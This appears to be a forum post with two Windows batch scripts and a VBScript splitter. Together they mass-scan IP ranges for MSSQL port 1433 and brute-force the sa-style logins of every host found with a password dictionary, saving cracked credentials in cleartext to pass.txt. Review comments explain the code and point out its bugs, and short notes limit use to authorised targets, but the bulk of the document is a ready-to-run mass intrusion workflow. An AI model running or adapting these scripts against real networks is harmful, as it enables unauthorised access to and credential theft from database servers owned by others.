需要 s.exe 和 scan.exe 配合使用，不熟悉这两个工具的请勿尝试。注意：下面的脚本会对整段 IP 做 1433 端口扫描，并用字典对扫到的主机做口令爆破，只能用于你有明确书面授权的目标；生成的 pass.txt 是明文口令，用完务必妥善处理。
下面是配套的 bat 脚本（两个版本）和它们调用的 vbs 分割脚本（需保存为 ip.vbs，放在同一目录）。
单进程多线程版:
:: Single-process variant of the MSSQL scan workflow:
::   step 1: s.exe (syn mode) probes every range listed in the IP-list file for
::           TCP 1433, one range per line, and saves hits to Result.txt;
::   step 2: the hits are pulled out of Result.txt and de-duplicated into ips.txt;
::   step 3: ip.vbs splits ips.txt into scan\N.txt chunks of 50 hosts and pn
::           cmd windows of scan.exe try the dic\sqlpass.dic word list against
::           each chunk, writing results to pass\N.txt, which are merged into pass.txt.
:: Requires s.exe, scan.exe, ip.vbs and dic\sqlpass.dic next to this file.
:: NOTE(review): this is a mass port scan followed by a credential brute force
:: against every host found. Run it only against systems you are explicitly
:: authorised to test, and treat pass.txt (cleartext credentials) as sensitive.
@echo off
setlocal enabledelayedexpansion
@cd /d "%~dp0"
:start
Title 第一步--多线程扫描端口中
Rem IP-range list file name (one "startIP endIP" pair per line, see the for loop below)
set /p IPlist= 输入你要扫描的ip表文件:
Rem directory for split chunk files (only the multi-process variant actually creates it)
@set Dname=list
Rem number of scan.exe windows to start in step 3
set /a pn=4
Rem NOTE(review): IPlist is used unquoted, so an empty answer or a path with spaces breaks this line.
if exist %IPlist% (goto next) else (@echo 没有找到 %IPlist% 文件,按任意键退出 & pause & exit)
:: (leftover heading from the multi-process variant; no process snapshot is taken here)
:next
::-------------------- step 1: port scan --------------------
Rem s.exe is run once per "startIP endIP" line, in the foreground, so this step is sequential
for /f "tokens=1,2 delims= " %%j in (%IPlist%) do s syn %%j %%k 1433 /Save
::-------------------- step 2: collect scan results --------------------
Title 第二步--整理扫描结果
Rem Drop s.exe's header/footer lines from Result.txt, keeping only host lines.
Rem NOTE(review): the patterns are unquoted, so cmd consumes the leading caret
Rem and findstr receives e.g. "L.*" and "N.*", i.e. any line containing an L
Rem or an N is removed, not only lines starting with one. Harmless for dotted
Rem IPs, but quote the patterns if the output format ever includes letters.
findstr /v /R ^Perf.* Result.txt>s1.txt
findstr /v /R ^Sca.* s1.txt>s2.txt
findstr /v /R ^L.* s2.txt>s3.txt
findstr /v /R ^N.* s3.txt>s4.txt
Rem first field of every remaining line (lines starting with - are skipped) is a live host
for /f "eol=- tokens=1 delims= " %%i in (s4.txt) do echo %%i>>ipst.txt
del s1.txt s2.txt s3.txt s4.txt result.txt
Rem NOTE(review): neither the Dname directory nor list.txt exists at this point in
Rem this variant; the next two lines are leftovers and only print errors.
@rd /s /q %Dname%
@del list.txt
::-------------------- de-duplicate --------------------
Rem Environment variables are used as a seen-set: a variable named after each IP
Rem is defined on first sight, so repeats are skipped (scoped by setlocal above).
for /f "delims=" %%i in (ipst.txt) do ( if not defined %%i set %%i=s & @echo %%i>>ips.txt)
@del ipst.txt
::-------------------- step 3: password scan --------------------
Title 第三步--多线程扫描
Rem NOTE(review): when pass or log already exists it is removed but NOT recreated,
Rem so on a second run scan.exe has no directory to write pass\N.txt and log\N.txt into.
@if exist pass\. (@rd /s /q pass) else (@md pass)
@if exist log\. (@rd /s /q log) else (@md log)
Rem split ips.txt into scan\1.txt, scan\2.txt, ... with 50 hosts each
@cscript.exe ip.vbs ips.txt scan 50
@del ips.txt
@for %%i in (scan\*.txt) do @echo %%i>>list.txt
::-------------------- number of scan processes --------------------
set n=0
for /f %%i in (list.txt) do ( set /a n+=1 )
set /a max=n+%pn%
:: n = number of chunk files, max = n + pn (upper bound of the inner loop below)
::-------------------- launch loop --------------------
Rem Start pn separate cmd windows; window i handles chunks i, i+4, i+8, ... and
Rem exits once the chunk number exceeds n.
Rem NOTE(review): the step is hard-coded as 4 instead of pn, so changing pn above
Rem leaves chunks unscanned (pn below 4) or scans some twice (pn above 4).
for /l %%i in (1,1,%pn%) do start for /l %%j in (%%i,4,%max%) do @if %%j gtr %n% (exit) else (scan -i scan\%%j.txt -p dic\sqlpass.dic -o pass\%%j.txt -l log\%%j.txt -c -t 600)
::-------------------- wait for the scanners to finish --------------------
Rem ping to 127.1 is the classic one-second sleep; poll every ~4 s until no scan.exe is left
:wait1
@for /l %%i in (4,-1,1) do @ping -n 2 127.1>nul & cls & @echo ------------------------------------------------------ & @echo 请不要关掉本窗口 & @echo 每隔%%i秒程序会自动判断是否该进入下一步 & @echo ------------------------------------------------------
@tasklist | findstr "\<scan.exe\>">nul
@if %errorlevel% == 0 (goto wait1) else (goto next2)
:next2
@cls
@if exist scan\. (@rd /s /q scan)
@if exist log\. (@rd /s /q log)
@if exist list.txt (del list.txt)
::-------------------- collect passwords --------------------
Rem first two fields of every line of every pass\N.txt (presumably "host credential"; depends on scan.exe's output format)
@for %%a in (pass\*.txt) do @for /f "usebackq tokens=1,2" %%i in ("%%a") do @echo %%i %%j>>pass.txt
Rem lines beginning with D are dropped (presumably scan.exe header text - confirm on a sample)
for /f "eol=D tokens=*" %%i in (pass.txt) do echo %%i>>passt.txt
del pass.txt
@if exist pass\. (@rd /s /q pass)
::-------------------- de-duplicate --------------------
Rem Same variable-as-set trick as above.
Rem NOTE(review): these lines have two fields, but "if defined" only takes the first
Rem token as the variable name; the rest of the line then becomes the command to
Rem run, which likely yields "is not recognized" errors and lets duplicates through.
for /f "delims=" %%i in (passt.txt) do ( if not defined %%i set %%i=s & @echo %%i>>pass.txt)
@del passt.txt
Rem NOTE(review): this redirects an empty line into a file named 扫描完毕 instead of
Rem printing the message; the multi-process variant ends with a plain echo and pause.
@echo.>扫描完毕
多进程多线程版:
:: Multi-process variant of the MSSQL scan workflow. Same three steps as the
:: single-process script, but step 1 splits the IP list into chunks of Num
:: lines (ip.vbs) and starts one s.exe window per chunk, and step 3 uses
:: chunks of 200 hosts. Outline:
::   step 1: s.exe (syn mode) probes every "startIP endIP" range for TCP 1433
::           and saves hits to Result.txt;
::   step 2: the hits are pulled out of Result.txt and de-duplicated into ips.txt;
::   step 3: pn cmd windows of scan.exe try dic\sqlpass.dic against the scan\N.txt
::           chunks, writing pass\N.txt, which are merged into pass.txt.
:: Requires s.exe, scan.exe, ip.vbs and dic\sqlpass.dic next to this file.
:: NOTE(review): mass port scan plus credential brute force of every host found.
:: Run it only against systems you are explicitly authorised to test, and treat
:: pass.txt (cleartext credentials) as sensitive.
@echo off
setlocal enabledelayedexpansion
@cd /d "%~dp0"
:start
Title 第一步--多线程扫描端口中
Rem IP-range list file name (one "startIP endIP" pair per line)
set /p IPlist= 输入你要扫描的ip表文件:
Rem directory the IP list is split into by ip.vbs (removed again in step 2)
@set Dname=list
Rem number of scan.exe windows to start in step 3
set /a pn=4
Rem NOTE(review): IPlist is used unquoted, so an empty answer or a path with spaces breaks this line.
if exist %IPlist% (goto next) else (@echo 没有找到 %IPlist% 文件,按任意键退出 & pause & exit)
:next
Rem count the non-empty lines of the list so the user can pick a sensible chunk size
@for /f %%l in (%IPlist%) do set /a znx+=1
@echo 扫描列表文件共有 %znx% 行
Rem lines per chunk; about znx divided by Num s.exe windows will be started
set /p Num= 输入文件最大行数:
::-------------------- process snapshot --------------------
Rem remember the PIDs of every cmd.exe that exists before the scan windows are started
if exist p.txt (@del p.txt)
@tasklist | findstr "\<cmd.exe\>">tmp.txt
@for /f "tokens=2 delims= " %%i in (tmp.txt) do echo %%i>>p.txt
::-------------------- step 1: port scan --------------------
@if exist list.txt (del list.txt)
Rem split the IP list into list\1.txt, list\2.txt, ... of Num lines each
@cscript.exe ip.vbs %IPlist% %Dname% %Num%
@for %%i in (%Dname%\*.txt) do @echo %%i>>list.txt
Rem one cmd window per chunk, each running s.exe once per "startIP endIP" line.
Rem NOTE(review): all windows save into the same Result.txt concurrently; whether
Rem s.exe serialises those writes is not visible here - check for truncated output.
for /f "eol=; delims= " %%i in (list.txt) do @start for /f "eol=; tokens=1,2 delims= " %%j in (%%i) do s syn %%j %%k 1433 /Save
::-------------------- restore snapshot --------------------
Rem Kill every cmd.exe that was not in the snapshot, i.e. the windows just
Rem started, so they do not pile up; without /T taskkill leaves their s.exe
Rem children running, which is presumably the intent.
Rem NOTE(review): this is racy and over-broad: a window that has not yet
Rem launched s.exe loses its chunk silently, any unrelated cmd.exe opened in
Rem between is killed as well, and findstr /G matches PIDs as substrings.
@tasklist | findstr "\<cmd.exe\>">tmp.txt
if exist p2.txt (@del p2.txt>nul)
@for /f "tokens=2 delims= " %%i in (tmp.txt) do echo %%i>>p2.txt
@del tmp.txt>nul
@findstr /V /G:p.txt p2.txt>pp.txt
@for /f %%i in (pp.txt) do ( @taskkill /pid %%i /f>nul )
@del p.txt,p2.txt,pp.txt
::-------------------- wait for s.exe to finish --------------------
Rem ping to 127.1 is the classic one-second sleep; poll every ~4 s until no s.exe is left
:wait
@for /l %%i in (4,-1,1) do @ping -n 2 127.1>nul & cls & @echo ------------------------------------------------------ & @echo 请不要关掉本窗口 & @echo 每隔%%i秒程序会自动判断是否该进入下一步 & @echo ------------------------------------------------------
@tasklist | findstr "\<s.exe\>">nul
@if %errorlevel% == 0 (goto wait) else (goto next1)
:next1
@cls
::-------------------- step 2: collect scan results --------------------
Title 第二步--整理扫描结果
Rem Drop s.exe's header/footer lines from Result.txt, keeping only host lines.
Rem NOTE(review): the patterns are unquoted, so cmd consumes the leading caret
Rem and findstr receives e.g. "L.*" and "N.*", i.e. any line containing an L
Rem or an N is removed, not only lines starting with one. Harmless for dotted
Rem IPs, but quote the patterns if the output format ever includes letters.
findstr /v /R ^Perf.* Result.txt>s1.txt
findstr /v /R ^Sca.* s1.txt>s2.txt
findstr /v /R ^L.* s2.txt>s3.txt
findstr /v /R ^N.* s3.txt>s4.txt
Rem first field of every remaining line (lines starting with - are skipped) is a live host
for /f "eol=- tokens=1 delims= " %%i in (s4.txt) do echo %%i>>ipst.txt
del s1.txt s2.txt s3.txt s4.txt result.txt
Rem remove the chunk directory created by ip.vbs and the chunk index
@rd /s /q %Dname%
@del list.txt
::-------------------- de-duplicate --------------------
Rem Environment variables are used as a seen-set: a variable named after each IP
Rem is defined on first sight, so repeats are skipped (scoped by setlocal above).
for /f "delims=" %%i in (ipst.txt) do ( if not defined %%i set %%i=s & @echo %%i>>ips.txt)
@del ipst.txt
::-------------------- step 3: password scan --------------------
Title 第三步--多线程扫描
Rem NOTE(review): when pass or log already exists it is removed but NOT recreated,
Rem so on a second run scan.exe has no directory to write pass\N.txt and log\N.txt into.
@if exist pass\. (@rd /s /q pass) else (@md pass)
@if exist log\. (@rd /s /q log) else (@md log)
Rem split ips.txt into scan\1.txt, scan\2.txt, ... with 200 hosts each
@cscript.exe ip.vbs ips.txt scan 200
@del ips.txt
@for %%i in (scan\*.txt) do @echo %%i>>list.txt
::-------------------- number of scan processes --------------------
set n=0
for /f %%i in (list.txt) do ( set /a n+=1 )
set /a max=n+%pn%
:: n = number of chunk files, max = n + pn (upper bound of the inner loop below)
::-------------------- launch loop --------------------
Rem Start pn separate cmd windows; window i handles chunks i, i+4, i+8, ... and
Rem exits once the chunk number exceeds n.
Rem NOTE(review): the step is hard-coded as 4 instead of pn, so changing pn above
Rem leaves chunks unscanned (pn below 4) or scans some twice (pn above 4).
for /l %%i in (1,1,%pn%) do start for /l %%j in (%%i,4,%max%) do @if %%j gtr %n% (exit) else (scan -i scan\%%j.txt -p dic\sqlpass.dic -o pass\%%j.txt -l log\%%j.txt -c -t 600)
::-------------------- wait for the scanners to finish --------------------
Rem poll every ~4 s until no scan.exe is left
:wait1
@for /l %%i in (4,-1,1) do @ping -n 2 127.1>nul & cls & @echo ------------------------------------------------------ & @echo 请不要关掉本窗口 & @echo 每隔%%i秒程序会自动判断是否该进入下一步 & @echo ------------------------------------------------------
@tasklist | findstr "\<scan.exe\>">nul
@if %errorlevel% == 0 (goto wait1) else (goto next2)
:next2
@cls
@if exist scan\. (@rd /s /q scan)
@if exist log\. (@rd /s /q log)
@if exist list.txt (del list.txt)
::-------------------- collect passwords --------------------
Rem first two fields of every line of every pass\N.txt (presumably "host credential"; depends on scan.exe's output format)
@for %%a in (pass\*.txt) do @for /f "usebackq tokens=1,2" %%i in ("%%a") do @echo %%i %%j>>pass.txt
Rem lines beginning with D are dropped (presumably scan.exe header text - confirm on a sample)
for /f "eol=D tokens=*" %%i in (pass.txt) do echo %%i>>passt.txt
del pass.txt
@if exist pass\. (@rd /s /q pass)
::-------------------- de-duplicate --------------------
Rem Same variable-as-set trick as above.
Rem NOTE(review): these lines have two fields, but "if defined" only takes the first
Rem token as the variable name; the rest of the line then becomes the command to
Rem run, which likely yields "is not recognized" errors and lets duplicates through.
for /f "delims=" %%i in (passt.txt) do ( if not defined %%i set %%i=s & @echo %%i>>pass.txt)
@del passt.txt
@echo 扫描完毕,查看本目录下pass.txt密码。
pause
涉及到的vbs:
' Minimal VBScript text splitter: copies the input file into dname\1.txt,
' dname\2.txt, ... with at most num lines per chunk. The batch scripts above
' call it as  cscript.exe ip.vbs <list file> <output dir> <lines per chunk>.
' Author: Yatere
' QQ: 4699366
' NOTE(review): On Error Resume Next suppresses every failure below (missing
' input file, folder that cannot be deleted, non-numeric num), so the script
' can silently leave an empty or partial directory; drop it or check Err
' after each step if the callers need to rely on the output.
On Error Resume Next
If WScript.Arguments.Count <> 3 Then
' NOTE(review): the usage text says Exp.vbs, but the batch files call it ip.vbs.
WScript.Echo "Usage: Cscript.exe Exp.vbs 文件名 目录名 分割数"
WScript.Quit
End If
tname = WScript.Arguments(0)   ' input file to split
dname = WScript.Arguments(1)   ' output directory, recreated from scratch
num = WScript.Arguments(2)     ' max lines per chunk (a string; coerced by the For loop below)
'num = 100 'max entries per file
'tname = "ip.txt" 'file to split
'dname = "ip" 'directory name
Set fs =CreateObject("scripting.filesystemobject")
Set gs =CreateObject("scripting.filesystemobject")
' 1 = ForReading; the trailing True creates tname if it is missing, which then
' reads as empty input instead of raising an error.
Set f=fs.opentextfile(tname,1,true)
' WARNING: the directory named by the second argument is deleted recursively
' and recreated; never point it at a directory you want to keep.
if fs.FolderExists(dname) then
fs.DeleteFolder(dname)
end if
set fd=fs.Createfolder(dname)
set fd=Nothing
n=0
do while f.atendofstream<>true
n=n+1
Dim data
' 2 = ForWriting, create if missing. Only the last chunk is closed explicitly
' below; earlier ones are presumably closed when g is reassigned and the old
' TextStream is released.
Set g=gs.opentextfile(dname+"\"+CStr(n)+".txt",2,true)
'if f.atendofstream<>true then
' copy up to num lines into this chunk; the inner check stops at end of input
for a=1 to num
if f.atendofstream<>true then
data=f.readline
g.writeline data
end if
next
'end if
loop
f.close
g.close
Set fs=Nothing
Set gs=Nothing